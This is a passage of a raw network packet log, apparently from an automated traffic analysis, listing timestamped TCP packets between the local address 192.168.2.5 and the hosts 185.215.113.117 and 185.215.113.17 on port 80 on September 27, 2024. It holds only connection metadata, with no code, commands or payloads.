                                                                          Sep 27, 2024 04:21:17.921348095 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.921348095 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.921356916 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921367884 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921377897 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.921395063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.921395063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.924237967 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.946711063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.946737051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.946754932 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.946765900 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.946775913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.946796894 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.946798086 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.946819067 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.946832895 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.946842909 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.946865082 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.946865082 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.947236061 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.949440956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949476957 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949496031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949508905 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949529886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949537992 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.949537992 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.949542046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949556112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949573040 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.949651003 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.949835062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949847937 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949858904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949871063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949887037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949894905 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.949894905 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.949934006 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.949934006 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.949973106 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949986935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.949996948 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.950017929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.950017929 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.950037956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.950103998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.950115919 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.950139999 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.950139999 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.950171947 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.950184107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.950215101 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.950215101 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.950242043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.950253963 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.950268030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.950300932 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.950300932 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.958694935 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958745003 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958755016 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958775997 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958786964 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958796978 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.958798885 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958810091 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958822012 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958834887 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.958842039 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958857059 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.958874941 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.958918095 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958928108 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958939075 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958962917 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.958980083 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.958985090 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.958992004 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959002972 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959008932 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959012985 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959026098 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959041119 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959083080 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959095001 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959106922 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959117889 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959130049 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959155083 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959166050 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959178925 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959189892 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959197998 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959208012 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959218979 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959222078 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959229946 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959244013 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959266901 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959321022 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959332943 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959345102 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959356070 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959356070 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959371090 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959378958 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959399939 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959420919 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959433079 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959445953 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959453106 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959465027 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959475994 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959477901 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959498882 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959522009 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959526062 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959538937 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959547997 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959567070 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959588051 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959727049 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959774017 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959791899 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959815979 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959821939 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959834099 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959839106 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959861040 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959868908 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959882021 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959903955 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959923983 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959933996 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959943056 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959956884 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959961891 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959969044 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959980965 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.959989071 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.959989071 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960000038 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960004091 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960012913 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960021973 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960026026 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960031986 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960042953 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960047960 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960053921 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960072994 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960084915 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960098028 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960114956 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960114956 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960129023 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960139990 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960143089 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960156918 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960161924 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960169077 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960176945 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960192919 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960208893 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960268974 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960280895 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960292101 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960303068 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960314035 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960314035 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960335970 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960350037 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960437059 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960448980 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.960469007 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.960481882 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.961870909 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.961884022 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.961895943 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.961920977 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.961936951 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.961941004 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.961949110 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.961961031 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.961978912 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.961985111 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.961985111 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.961999893 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.962014914 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.968096972 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.968152046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.968163013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.968226910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.968239069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.968251944 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.968262911 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.968276978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.968276978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.969223976 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.969384909 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.969403982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.969413042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.969445944 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.969474077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.969485044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.969496965 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.969508886 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.969508886 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.969527006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.969543934 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.969564915 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.969564915 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.971755981 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.003645897 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.003743887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.003755093 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.003773928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.003781080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.003781080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.003786087 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.003798962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.003813028 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.003860950 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.003916979 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.003916979 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.004818916 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.004831076 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.004842997 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.004889965 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.004898071 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.004909992 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.004923105 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.004924059 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.004934072 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.004946947 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.004960060 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.004987955 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005067110 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005078077 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005089045 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005100965 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005111933 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005122900 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005130053 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005130053 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005136013 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005145073 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005147934 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005158901 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005170107 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005171061 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005192995 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005223989 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005244970 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005255938 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005266905 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005276918 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005285978 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005295038 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005296946 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005309105 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005319118 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005320072 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005331039 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005341053 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005342007 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005352974 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005362988 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005366087 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005374908 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005382061 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005386114 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005397081 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005399942 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005414963 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005422115 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005446911 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005486012 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005496979 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005511045 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005515099 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005522013 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005537033 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005554914 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005614042 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005625010 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005636930 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005650043 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005650043 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005655050 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005661964 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005671978 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005672932 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005683899 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005686045 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005703926 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005728006 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:18.005783081 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005815029 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005817890 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.005825996 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005851030 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005861998 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.005861998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.005861998 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.005897045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.005897045 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.005968094 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.006267071 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.006325006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.006408930 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010324001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010340929 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010351896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010360956 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010361910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010375023 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010385990 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010389090 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010389090 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:18.010401011 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010413885 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010426044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:18.010433912 CEST4972580192.168.2.5185.215.113.117
